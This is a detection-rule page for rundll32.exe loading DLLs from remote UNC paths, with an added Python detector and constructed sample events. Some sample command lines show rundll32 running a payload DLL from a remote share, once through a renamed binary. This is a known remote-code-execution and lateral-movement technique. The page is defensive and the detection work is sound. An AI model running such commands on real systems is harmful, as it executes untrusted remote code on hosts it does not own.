
Summary
This detection rule identifies executions of rundll32.exe, the Windows utility that loads a DLL and calls one of its exported functions, when the DLL is located on a remote UNC path. Attackers often use this to deploy a payload hosted on a remote location, evading detection by executing untrusted code from an untrusted source. The rule matches command line arguments indicative of UNC path usage (a `\\host\share` prefix) together with the usual characteristics of a rundll32 execution. The detection is rated high severity because of the potential for malware to execute in the context of the system. Monitoring system processes and their behaviour closely strengthens the security posture against execution methods used for lateral movement within networks.
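The following is an added example of the detection logic described above, written for this page and not the rule's own implementation. It assumes Sysmon-style process-creation fields (`Image`, `CommandLine`, `OriginalFileName`), a hypothetical rule name, and constructed sample events; it also handles two edge cases the summary implies but does not spell out: a renamed copy of rundll32 (caught via `OriginalFileName`) and the local device namespaces `\\?\` and `\\.\`, which look like UNC prefixes but are not network paths.

```python
import re
from typing import Dict, List, Optional

# Hypothetical rule metadata for the alert record (not identifiers from the page).
RULE_NAME = "rundll32 DLL load from UNC path"
SEVERITY = "high"

# A UNC path token in a command line: \\host\share[\more], either quoted
# (spaces allowed) or bare (terminated by whitespace or a quote). The device
# namespaces \\?\ and \\.\ are local, not network, and are excluded.
UNC_RE = re.compile(
    r"""("\\\\(?![?.]\\)[^"\\]+\\[^"]+")|(\\\\(?![?.]\\)[^\\\s"']+\\[^\s"']+)"""
)


def is_rundll32(event: Dict[str, str]) -> bool:
    """True if the process is rundll32, by image path or, for a renamed copy,
    by the PE OriginalFileName that Sysmon Event ID 1 records."""
    image = (event.get("Image") or "").lower()
    original = (event.get("OriginalFileName") or "").lower()
    return (image.endswith("\\rundll32.exe") or image == "rundll32.exe"
            or original == "rundll32.exe")


def unc_paths(command_line: str) -> List[str]:
    """Extract UNC paths from a command line, dropping surrounding quotes and
    a trailing ',EntryPoint' argument (rundll32's "dll,function" syntax)."""
    found = []
    for m in UNC_RE.finditer(command_line):
        token = m.group(0).strip('"')
        found.append(token.split(",", 1)[0])
    return found


def detect(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return an alert record if the event is rundll32 loading a DLL from a
    UNC path, else None."""
    if not is_rundll32(event):
        return None
    paths = unc_paths(event.get("CommandLine") or "")
    if not paths:
        return None
    return {
        "rule": RULE_NAME,
        "severity": SEVERITY,
        "image": event.get("Image"),
        "original_file_name": event.get("OriginalFileName"),
        "unc_paths": paths,
    }


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run the detection over a batch of process-creation events."""
    return [alert for alert in map(detect, events) if alert is not None]


# Constructed sample events (not real telemetry); hosts and shares are made up.
SAMPLE_EVENTS = [
    {   # benign: local DLL, should not alert
        "Image": r"C:\Windows\System32\rundll32.exe",
        "OriginalFileName": "RUNDLL32.EXE",
        "CommandLine": r'rundll32.exe "C:\Windows\System32\shell32.dll",Control_RunDLL',
    },
    {   # suspicious: DLL loaded from a remote share
        "Image": r"C:\Windows\System32\rundll32.exe",
        "OriginalFileName": "RUNDLL32.EXE",
        "CommandLine": r"rundll32.exe \\10.0.0.5\share\payload.dll,DllMain",
    },
    {   # UNC path, but not rundll32: out of scope for this rule
        "Image": r"C:\Windows\System32\notepad.exe",
        "OriginalFileName": "NOTEPAD.EXE",
        "CommandLine": r"notepad.exe \\fileserver\docs\readme.txt",
    },
    {   # renamed rundll32, identified by OriginalFileName
        "Image": r"C:\Users\Public\r.exe",
        "OriginalFileName": "RUNDLL32.EXE",
        "CommandLine": r"r.exe \\fileserver\c$\tools\x.dll,Go",
    },
    {   # device-namespace path: local, should not alert
        "Image": r"C:\Windows\System32\rundll32.exe",
        "OriginalFileName": "RUNDLL32.EXE",
        "CommandLine": r"rundll32.exe \\?\C:\Windows\System32\shell32.dll,Control_RunDLL",
    },
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Two of the five constructed events produce alerts: the plain rundll32 load from `\\10.0.0.5\share` and the renamed copy, which the image-name check alone would miss. Dropping the `,EntryPoint` suffix and the quotes normalises the reported path so that downstream enrichment (for example, checking whether the host is an approved file server) sees the same value regardless of how the command line was written.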
Categories
- Windows
Data Sources
- Process
Created: 2022-08-10